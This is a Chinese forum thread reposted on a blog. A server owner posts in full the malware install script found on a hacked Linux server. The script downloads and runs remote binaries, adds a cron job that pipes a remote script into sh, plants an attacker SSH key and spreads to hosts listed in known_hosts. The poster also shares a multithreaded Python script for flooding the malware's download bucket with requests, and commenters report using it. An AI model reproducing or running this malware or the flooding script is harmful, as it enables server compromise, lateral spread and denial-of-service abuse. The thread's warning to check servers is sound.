跳至主要內容
  • Hostloc 空間訪問刷分
  • 售賣場
  • 廣告位
  • 賣站?

4563博客

全新的繁體中文 WordPress 網站
  • 首頁
  • 机器又被黑了,附上木马安装脚本,大家也自行检查下吧
未分類
9 4 月 2020

机器又被黑了,附上木马安装脚本,大家也自行检查下吧

class 大佬有话说 :

机器又被黑了,附上木马安装脚本,大家也自行检查下吧

本帖最后由 class 于 2020-4-7 22:48 编辑

20200407 22:47, 更新程序下载地址,可以继续刷了。(下方脚本已经更新)

https://apparel.oss-cn-hangzhou.aliyuncs.com/storefile/watch_Linux_x86_64

目前文件已经被删除,无法刷了。

突然检查到服务器又被黑,看了下还是这个"老朋友"的程序。

大家也可以按照脚本内容检查下自己的服务器。

木马程序目前是放在腾讯云的cos(你懂的),另外附赠一个多线程下载木马程序的脚本。

木马安装脚本
#!/bin/sh

#version
watchVersion="-5e4b58b"
nodeVersion="-5e4b58b"

#dealChattr
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i

#directory
oldDirectory=$(pwd)
mkdir -p /tmp
chmod 1777 /tmp
cd /tmp
touch /var/tmp/writeable && cd /var/tmp/
touch /dev/shm/writeable && cd /dev/shm
touch ~/writeable && cd ~/
touch $oldDirectory/writeable && cd $oldDirectory
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /var/tmp/writeable ~/writeable$oldDirectory/writeable /dev/shm/writeable /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
currentDirectory=$(pwd)

#killPast
ps auxf| grep system-watch*| grep -v grep| grep -v system-watch$watchVersion| awk ‘{print $2}’| xargs kill -9
ps auxf| grep system-node*| grep -v grep| grep -v system-node$nodeVersion| awk ‘{print $2}’| xargs kill -9

#rm oldVersion
find system-watch* | grep -v system-watch$watchVersion | xargs rm
find system-node* | grep -v system-node$nodeVersion | xargs rm

ps -ef | grep "system-node" | grep -v "grep" | awk ‘{print $2}’ | xargs kill -9

#watchRun?
ps auxf | grep system-watch$watchVersion | grep -v grep
if [ $? -eq 0 ]
then
        echo "watch running"
else
        #updateNew
        curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -o system-watch$watchVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -O system-watch$watchVersion
        chmod +x system-watch$watchVersion
        $currentDirectory/system-watch$watchVersion
fi

#nodeRun?
ps auxf | grep system-node$nodeVersion | grep -v grep
if [ $? -eq 0 ]
then
        echo "node running"
else
        #updateNew
        curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -o system-node$nodeVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -O system-node$nodeVersion
        chmod +x system-node$nodeVersion
        $currentDirectory/system-node$nodeVersion
fi

#rcLocal
if test -d /etc/rc.d/
then
    echo "centos rc.local"
    sed -i ‘/system-/d’ /etc/rc.d/rc.local
        sed -i ‘/system_/d’ /etc/rc.d/rc.local
        echo $currentDirectory/system-watch$watchVersion >> /etc/rc.d/rc.local
        echo $currentDirectory/system-node$nodeVersion >> /etc/rc.d/rc.local
        chmod +x /etc/rc.d/rc.local
else
        echo "ubuntu rc.local"
    sed -i ‘/system-/d’ /etc/rc.local
        sed -i ‘/system_/d’ /etc/rc.local
        echo $currentDirectory/system-watch$watchVersion >> /etc/rc.local
        echo $currentDirectory/system-node$nodeVersion >> /etc/rc.local
        chmod +x /etc/rc.local
fi

#cronTab
crontab -l| grep "https://app.lutai.network:33035/assets/node.sh" > /dev/null
if [ $? -eq 0 ]; then
    echo "crontab found"
else
    (crontab -l ; echo "*/60 * * * * (curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &") | crontab –
fi

#sshPublicKey
if test -d ~/.ssh/
then
    echo "ssh directory exist"
else
    mkdir ~/.ssh/
fi
grep "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" ~/.ssh/authorized_keys > /dev/null
if [ $? -eq 0 ]; then
    echo "ssh_rsa found"
else
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" >> ~/.ssh/authorized_keys
        chmod 600 ~/.ssh/authorized_keys
        chmod 700 ~/.ssh/
fi

#bashRc
# echo "(curl -fsSL https://app.lutai.network:33035/assets/lutai||wget -q -O- https://app.lutai.network:33035/assets/lutai)|sh >/dev/null 2>&1 &" >> /etc/bashrc

#sshLogin
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "b({1,3}.){3}{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &" & done
fi

for file in /home/*
do
    if test -d $file; then
      if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "b({1,3}.){3}{1,3}b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &" & done
      fi
    fi
done

python3 木马下载脚本

使用方法

yum install -y python36 python36-devel screen
pip3 install requests
vi z.py    # 把下面的内容粘贴进去
screen -S z # 创建一个远程会话
python3 z.py   # 运行脚本
ps -ef | grep "z.py" | grep -v "grep" | awk ‘{print $2}’ | xargs kill -9    # 结束命令

#coding:utf-8
import requests
import threading

# 并发数
thread_max = threading.BoundedSemaphore(100)
curl = requests.session()
curl.timeout = 120
curl.headers = {
    ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36’
}

class MyThread(threading.Thread):

    def __init__(self):
      # 重写写父类的__init__方法
      super(MyThread, self).__init__()
      self.url = ‘https://apparel.oss-cn-hangzhou.aliyuncs.com/storefile/watch_Linux_x86_64’

    def run(self):
      try:
            url = self.url
            if self.download(url):
                print("下载成功: %s" % url)
            else:
                print("下载失败: %s" % url)
      except Exception as e:
            print(e)
            pass
      # 任务跑完移除线程
      thread_max.release()

    # 下载
    def download(self, url):
      try:
            curl.get(url)
            return True
      except BaseException as e:
            return False

# 开始操作
def start():
    Thread_list = []
    for url in range(1000000000):
      # 如果线程达到最大值则等待前面线程跑完空出线程位置
      thread_max.acquire()
      p = MyThread()
      p.start()
      Thread_list.append(p)
    for i in Thread_list:
      i.join()

if __name__ == ‘__main__’:
    start()

h20 大佬有话说 :

矿工进驻了吗?

skyboy0671 大佬有话说 :

学习了。。楼主分析出是怎么给你挂上去的吗??脚本??服务器ssh?

iamydp 大佬有话说 :

连代码都给出来了,那我3o就不客气了:lol

class 大佬有话说 :

skyboy0671 大佬有话说 : 2020-4-6 22:01
学习了。。楼主分析出是怎么给你挂上去的吗??脚本??服务器ssh?

之前是因为程序的漏洞通过调用curl 命令导致被挂马的。

还有一种就是 redis 对外开放且没设置密码。

刚发现的这台目前没分析出是什么时候被挂的。

故事霸霸 大佬有话说 :

本帖最后由 故事霸霸 于 2020-4-6 22:13 编辑

yc010t刷起来了
https://ae01.alicdn.com/kf/H189f5f45eda04181ab3cec9896edf415f.jpg

class 大佬有话说 :

iamydp 大佬有话说 : 2020-4-6 22:03
连代码都给出来了,那我3o就不客气了

资源是放在良心云COS的,3o在境外效果可能会差一些,用国内的机器会比较爽(不能用良心云)

她教我打狙 大佬有话说 :

mjj   gogogo

故事霸霸 大佬有话说 :

yc010t文件删掉了,刷了大概5个t左右

姬长信 大佬有话说 :

故事霸霸 大佬有话说 : 2020-4-7 10:53
文件删掉了,刷了大概5个t左右

nbq

文章導覽

上一篇文章
下一篇文章

AD

其他操作

  • 登入
  • 訂閱網站內容的資訊提供
  • 訂閱留言的資訊提供
  • WordPress.org 台灣繁體中文

51la

4563博客

全新的繁體中文 WordPress 網站
返回頂端
本站採用 WordPress 建置 | 佈景主題採用 GretaThemes 所設計的 Memory
4563博客
  • Hostloc 空間訪問刷分
  • 售賣場
  • 廣告位
  • 賣站?
在這裡新增小工具